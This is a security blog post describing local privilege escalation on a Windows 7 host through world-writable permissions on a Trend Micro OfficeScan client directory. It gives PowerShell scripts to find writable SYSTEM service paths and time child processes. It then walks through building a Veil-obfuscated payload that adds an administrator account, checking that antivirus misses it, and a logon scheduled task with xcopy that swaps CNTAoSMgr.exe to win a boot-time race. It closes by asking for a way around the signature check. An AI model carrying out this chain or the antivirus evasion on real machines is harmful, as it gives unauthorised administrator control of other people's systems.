Security

Feedback from a weak file permissions fail

Author: llaise

A few weeks ago, I got a shell on a fully patched Windows 7 box with a limited user account (let's call it « limited_user »). Of course, the goal was to turn that into an admin/SYSTEM shell.

Fail !

After running the usual checks, something caught my attention…

File permission fail
Wait… what?

… Can every user edit the Trend Micro OfficeScan directory? That looks promising. Time to investigate!
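The check that surfaced this finding, generalized a little, as an added PowerShell example (not code from the original post): walk both Program Files roots, flag every directory that a broad principal (Everyone, Authenticated Users, BUILTIN\Users) can create or overwrite files in, and list the services running as LocalSystem whose binary lives under one of those directories. Principals are matched by well-known SID rather than by name, so the check also works on a French Windows where the group is called « Utilisateurs ». It only uses cmdlets available in the PowerShell 2.0 that ships with Windows 7.

```powershell
# Added example, not from the original post. Finds directories under Program
# Files that broad principals may write to, then services running as SYSTEM
# whose executable sits inside one of them.
$broadSids = @('S-1-1-0',        # Everyone
               'S-1-5-11',       # Authenticated Users
               'S-1-5-32-545')   # BUILTIN\Users ("Utilisateurs" on a French system)
# CreateFiles (= WriteData) is the bit that lets you drop/overwrite a file in a
# directory; Write, Modify and FullControl all contain it.
$needed = [System.Security.AccessControl.FileSystemRights]::CreateFiles

function Test-BroadWrite {
    param([string]$Path)
    $acl = Get-Acl -Path $Path -ErrorAction SilentlyContinue
    if (-not $acl) { return $false }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        try { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
        catch { continue }
        if (($broadSids -contains $sid) -and (($ace.FileSystemRights -band $needed) -ne 0)) { return $true }
    }
    return $false
}

$roots = @($env:ProgramFiles, ${env:ProgramFiles(x86)}) | Where-Object { $_ -and (Test-Path $_) }
$weakDirs = foreach ($root in $roots) {
    # PSIsContainer instead of -Directory so this runs on PowerShell 2.0 (Windows 7).
    Get-ChildItem -Path $root -Recurse -ErrorAction SilentlyContinue |
        Where-Object { $_.PSIsContainer -and (Test-BroadWrite -Path $_.FullName) } |
        ForEach-Object { $_.FullName }
}
$weakDirs | ForEach-Object { "Writable by a broad principal: $_" }

# Services running as LocalSystem whose image path starts with a weak directory.
Get-WmiObject -Class Win32_Service |
    Where-Object { $_.StartName -eq 'LocalSystem' -and $_.PathName } |
    ForEach-Object {
        # PathName may be quoted and may carry arguments; keep up to the first .exe.
        if ($_.PathName -match '^"?(.+?\.exe)') { $exe = $Matches[1] } else { return }
        $hit = $weakDirs | Where-Object { $exe.StartsWith($_, [System.StringComparison]::OrdinalIgnoreCase) }
        if ($hit) { '{0,-20} {1,-8} {2}' -f $_.Name, $_.State, $exe }
    }
```

A quick one-liner for a single directory is `icacls "C:\Program Files (x86)\Trend Micro\OfficeScan Client"`: any `(W)`, `(M)` or `(F)` entry for Users, Everyone or Authenticated Users is the same finding. Note that the service binary itself is not the only interesting file; as the post shows next, a child executable spawned later by a SYSTEM service from the same writable directory is just as good a target.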

Investigation !

Which version is it ?

OfficeScan – Version

Which services are running by Trend ?

Trend/OfficeScan services

Which processes are actually running ?

Process list

Okay, so PccNTMon.exe is the OfficeScan GUI, running with « limited_user »'s rights, but the other processes run as SYSTEM. At this point I figured it would be nice to build a malicious payload and drop it in place of a legitimate Trend binary. The main problem is that OfficeScan starts at boot, and the image file of a running process is locked: we can't overwrite or replace it while the SYSTEM process is running.

If we look more closely at Trend's process list, we see something interesting: the process « CNTAoSMgr.exe » has « TMListen » as its parent and starts about 30 seconds AFTER TMListen. 30 seconds? Could that be enough time to log on before « CNTAoSMgr.exe » starts and put our payload in its place?
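The timing observation above, measured instead of eyeballed, as an added PowerShell example (not code from the original post): for every running process whose image name matches an .exe in the OfficeScan client directory, print its owner, its parent and how many seconds after the parent it started. The directory is the one named in the post; matching on process name rather than ExecutablePath is deliberate, because a limited user cannot read the image path of SYSTEM processes through WMI, and GetOwner() will likewise return access denied for them (shown as "?").

```powershell
# Added example, not from the original post. Process tree and start delays for
# the binaries shipped in the OfficeScan client directory.
$dir   = 'C:\Program Files (x86)\Trend Micro\OfficeScan Client'
$names = Get-ChildItem -Path $dir -Filter *.exe -ErrorAction SilentlyContinue | ForEach-Object { $_.Name }

$all  = Get-WmiObject -Class Win32_Process
$byId = @{}
foreach ($p in $all) { $byId[[int]$p.ProcessId] = $p }

$rows = foreach ($p in $all) {
    if (-not ($names -contains $p.Name)) { continue }   # -contains is case-insensitive
    $owner = $p.GetOwner()
    $ownerName = if ($owner.ReturnValue -eq 0) { "$($owner.Domain)\$($owner.User)" } else { '?' }
    $parent = $byId[[int]$p.ParentProcessId]
    $parentName = if ($parent) { $parent.Name } else { "(exited: pid $($p.ParentProcessId))" }
    $started = [System.Management.ManagementDateTimeConverter]::ToDateTime($p.CreationDate)
    $delay = $null
    if ($parent -and $parent.CreationDate) {
        $parentStart = [System.Management.ManagementDateTimeConverter]::ToDateTime($parent.CreationDate)
        $delay = [int]($started - $parentStart).TotalSeconds
    }
    New-Object PSObject -Property @{
        Name = $p.Name; Owner = $ownerName; Parent = $parentName
        StartedAt = $started; SecsAfterParent = $delay
    }
}
$rows | Sort-Object StartedAt | Format-Table Name, Owner, Parent, StartedAt, SecsAfterParent -AutoSize
```

Run it once from a fresh logon and once a minute later: a child that appears in the second run with a large SecsAfterParent, owned by SYSTEM and living in a directory you can write to, is the race window the rest of the post exploits.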

Payload time!

First, we need a payload that adds a user to the system and puts it in the « Administrateurs » group (the local Administrators group on a French Windows). The payload will sit on disk, so the antivirus may catch it; we'll use the Veil Framework to obfuscate it. (Please remember: never upload these payloads to an online scanner!)

Payload created with the Veil Framework

Then I test the file with an up-to-date local AV…

Payload isn't detected 🙂

Looks fine :)

Schedule it!

Second, we'll create a scheduled task to replace C:\Program Files (x86)\Trend Micro\OfficeScan Client\CNTAoSMgr.exe with our payload. As a limited user we can't schedule a task to run at system startup, but we can create one that runs when our own session starts (a logon trigger).

# Command to schedule (copy payload from desktop to Office Scan Dir)

xcopy "C:\Users\limited_user\Desktop\CNTAoSMgr.exe" "C:\Program Files (x86)\Trend Micro\OfficeScan Client\" /Y
Scheduled task
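The scheduling step and the post-reboot verification in full, as an added PowerShell example (not code from the original post): the xcopy from the post is wrapped in a small .cmd file so that schtasks' /TR argument needs no nested quoting, the task is registered with a logon trigger for the calling account (which needs no admin rights), and after the reboot the swapped binary, its signature and the new user are checked. The task name and wrapper file name are assumptions; the paths are the ones from the post.

```powershell
# Added example, not from the original post. Register the logon task as the
# limited user, then verify the result after the reboot.
$src    = "$env:USERPROFILE\Desktop\CNTAoSMgr.exe"
$dst    = 'C:\Program Files (x86)\Trend Micro\OfficeScan Client\'
$target = Join-Path $dst 'CNTAoSMgr.exe'

# Wrapper script: avoids fighting schtasks /TR quoting with paths that contain spaces.
$wrapper = "$env:USERPROFILE\cntao_swap.cmd"          # assumed name
@('@echo off', "xcopy `"$src`" `"$dst`" /Y") | Set-Content -Path $wrapper -Encoding Ascii

# ONLOGON for the current account does not require elevation; /F overwrites an old task.
schtasks.exe /Create /F /TN 'OfficeScanSwap' /SC ONLOGON /TR "`"$wrapper`""
schtasks.exe /Query /TN 'OfficeScanSwap' /V /FO LIST

# Why running the task right now fails: the legitimate binary is in use by a SYSTEM process.
Get-Process -Name CNTAoSMgr -ErrorAction SilentlyContinue | Select-Object Id, ProcessName

# ---- after the reboot, from the new logon session ----
# Did the swap land? Compare version info with the screenshot taken before rebooting.
(Get-Item -Path $target).VersionInfo | Select-Object FileDescription, CompanyName, FileVersion
# A replaced binary shows NotSigned here; this is exactly what OfficeScan 11 checks.
Get-AuthenticodeSignature -FilePath $target | Select-Object Status, SignerCertificate
# The payload's effect: the new user and its group membership.
net.exe user admin_user
net.exe localgroup Administrateurs
```

Run the first part as « limited_user », reboot, log back in, and run the second part once the Trend processes have settled; if the copy lost the race, the signature check still says Valid and the version info is unchanged, which tells you the task fired too late rather than that the payload was caught.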


If we run the task right now, it fails because the legitimate CNTAoSMgr.exe is running and its file is locked. There's no « admin_user » yet.


Pwn time !

Time to reboot and see what happens!

Before rebooting, the legitimate CNTAoSMgr.exe looks like this:

CNTAoSMgr.exe before reboot

After rebooting…

CNTAoSMgr.exe after reboot (payload in place)

After a few seconds…

The user is created!
admin_user info

Pwnd =)

Notes!

I tried this against OfficeScan 11, but it failed because the agent checks the digital signature before executing the « .exe ». If anyone has a trick to bypass this check, please contact me =)